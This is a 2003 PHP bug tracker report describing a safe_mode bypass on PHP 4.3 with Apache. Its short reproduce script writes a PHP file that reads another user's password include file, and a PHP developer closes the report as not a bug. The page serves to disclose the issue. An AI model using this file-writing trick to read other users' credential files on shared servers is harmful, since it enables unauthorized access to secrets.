PHP :: Bug #25149 :: safe

Bug #25149	safe_mode bypass
Submitted:	2003-08-19 11:15 UTC	Modified:	2003-08-19 11:18 UTC
From:	marrtins at hackers dot lv	Assigned:
Status:	Not a bug	Package:	Scripting Engine problem
PHP Version:	4.3.1	OS:	Linux
Private report:	No	CVE-ID:	None

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	marrtins at hackers dot lv
New email:
PHP Version:		OS:

New Comment:

[2003-08-19 11:15 UTC] marrtins at hackers dot lv

Description:
------------
apache_1.3.27
httpd.conf
----------
User webmaster
Group nobody

./configure --activate-module=src/modules/php4/libphp4.a --enable-module=rewrite

======================================
php-4.3.0
php.ini
---------
safe_mode               =       On

./configure \
--with-mysql=/usr/local \
--with-mcrypt=/usr/local/lib/libmcrypt \
--with-apache=../apache_1.3.27 \
--enable-track-vars \
--with-gd=/usr/local \
--with-interbase=/opt/interbase \
--enable-trans-sid \
--with-png-dir=/usr/local \
--with-jpeg-dir=/usr/local \
--with-zlib-dir=/usr/local \
--enable-sockets \
--with-gettext \
--with-xml \
--enable-ftp \
--with-imap=/root/.hore_imp/imap-2002.RC10 \
--with-iconv=/usr/local/

======================================

~/public_html> ls -al *
drwxr-xr-x    3 test     users        4096 aug 19 19:05 .
drwx--x--x    5 test     users        4096 aug 19 19:04 ..
-rw-r--r--    1 test     users         146 aug 19 18:47 hack.php
drwxrwxrwx    2 test     users        4096 aug 19 19:03 test

after accessing http://some_server/~test/hack.php php makes test/stole.php

~/public_html> ls -al test
drwxrwxrwx    2 test     users        4096 aug 19 19:07 .
drwxr-xr-x    3 test     users        4096 aug 19 19:05 ..
-rw-r--r--    1 webmaste nobody         61 aug 19 19:07 stole.php

after that http://some_server/~test/test/stole.php locally reads /www/secret/pass.inc.php owned by webmaster

Reproduce code:
---------------
<?
  $data='<? $data = file(\'/www/secret/pass.inc.php\'); print_r($data); ?>';
  $f=fopen('/home/test/public_html/test/stole.php', 'w');
  fwrite($f, $data);
  fclose($f);
?>

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2003-08-19 11:18 UTC] iliaa@php.net

Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

This is how safe_mode works.

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2026 The PHP Group All rights reserved.	Last updated: Wed Feb 18 01:00:01 2026 UTC